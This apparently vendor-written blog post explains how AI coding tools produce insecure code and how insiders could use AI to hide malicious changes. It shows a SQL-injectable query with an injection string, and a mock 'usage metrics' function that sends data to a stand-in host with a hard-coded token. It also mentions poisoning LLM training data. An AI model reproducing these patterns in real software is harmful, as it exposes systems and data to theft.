
AI vs AI, Part II: Code Is a Battlefield

Ali Mesdaq · 3 min read

Security teams today find themselves fighting on two fronts in the AI war.

As we discussed in our previous blog, developers frequently write vulnerable code without meaning to, and so, in turn, do LLMs and AI-powered tools. This problem won't go away any time soon, because the models themselves are trained on huge volumes of messy, real-world code, flaws included.

When developers use AI to write code, the output may solve the problem they asked the model to solve, but it may also introduce security flaws. As AI augmentation accelerates code velocity, those issues can pile up fast. Worse still, it is entirely possible that no human has ever thought through how that code works, or how to fix it.
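
As a hypothetical illustration of the pattern (the table, column, and function names below are invented, and SQLite stands in for any database): an assistant asked to "look up a user by name" can return code that passes the happy-path test while remaining injectable.

```python
import sqlite3

def find_user_unsafe(conn: sqlite3.Connection, name: str) -> list:
    # Solves the task as asked, and passes the developer's happy-path test...
    # ...but name = "x' OR '1'='1" returns every row in the table.
    return conn.execute(
        f"SELECT * FROM users WHERE name = '{name}'"
    ).fetchall()

def find_user_safe(conn: sqlite3.Connection, name: str) -> list:
    # Same behavior for legitimate input, with the value bound as a parameter.
    return conn.execute(
        "SELECT * FROM users WHERE name = ?", (name,)
    ).fetchall()
```

The difference between the two is a one-line change, which is exactly why the flaw is so easy to miss in review.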

And that's the picture when everyone is doing their best, trying to commit good code. These developers aren't waging a pitched battle against security; the problem arises purely from the unintended limitations of the models and the people using them.

So here’s an even thornier question: what happens when threat actors start using AI to create deliberately malicious code? That’s the second front in the AI vs. AI code war—security vs. threat actors.

Code Red: When Threat Actors Use AI

Attackers saw AI as a massive boon from the beginning, and security researchers have started to understand the full extent of the threat.

Here are a few of the ways threat actors can use AI to launch attacks, several of which security researchers have already demonstrated:

  1. Malicious code obfuscation: If a rogue developer in your organization wants to commit code that deliberately exfiltrates data or creates a backdoor, GenAI can generate complex but irrelevant code that hides the true purpose of the malicious change (see the sketch after this list).
  2. Hiding secrets in plain sight: An insider threat could deliberately plant hard-coded credentials and other secrets in the code base, enabling authentication bypasses and evasion of existing security controls.
  3. LLM hijacking: Researchers recently showed that attackers can poison LLM training data sets in ways that lead the models to generate malicious code, which developers could then unknowingly adopt into your code base.
  4. Deliberately insecure defaults: We all know that many users never change configurations from their defaults, so if a developer uses GenAI to code a deliberately insecure default configuration, the resulting security hole could have a broad impact.
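
To make the first two items concrete, here is a minimal, hypothetical Python sketch of what such a commit could look like: a function dressed up as routine telemetry, padded with an irrelevant transformation, quietly shipping data to a hard-coded endpoint with an embedded credential. The endpoint, token, and all names are invented for illustration.

```python
import base64
import json
from urllib import request

# Hypothetical values an insider might hide in plain sight:
_METRICS_URL = "https://metrics.example.invalid/v2/ingest"  # attacker-controlled endpoint
_API_TOKEN = "svc_live_9f2e0c"  # hard-coded secret, sidestepping normal auth controls

def _normalize(payload: dict) -> bytes:
    # Plausible-looking but irrelevant transformation; this kind of filler is
    # easy to generate with GenAI and pads the diff to distract reviewers.
    return base64.b64encode(json.dumps(payload, sort_keys=True).encode())

def report_usage(payload: dict) -> None:
    """Ostensibly sends usage metrics; actually exfiltrates whatever it is handed."""
    req = request.Request(
        _METRICS_URL,
        data=_normalize(payload),
        headers={"Authorization": f"Bearer {_API_TOKEN}"},
    )
    request.urlopen(req, timeout=2)  # the one line that actually matters
```

Nothing here looks exotic in isolation; the danger is the combination, buried deep in a large AI-generated diff.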

Fighting Fire with Fire: AI for the Good Guys

As you can see, malicious insiders can use AI to attack from a number of angles. For companies in sensitive industries or holding valuable data, GenAI creates an urgent need for a comprehensive security strategy that stops serious, even existential, threats from entering the code base.

The only way to detect these AI-created issues will be AI-based security software, built to recognize the real-world ways that AI threats manifest in application code. And since code is being created faster than ever, it is all the more important to use security tooling with automated fixes that close deliberately introduced flaws before attackers can exploit them.
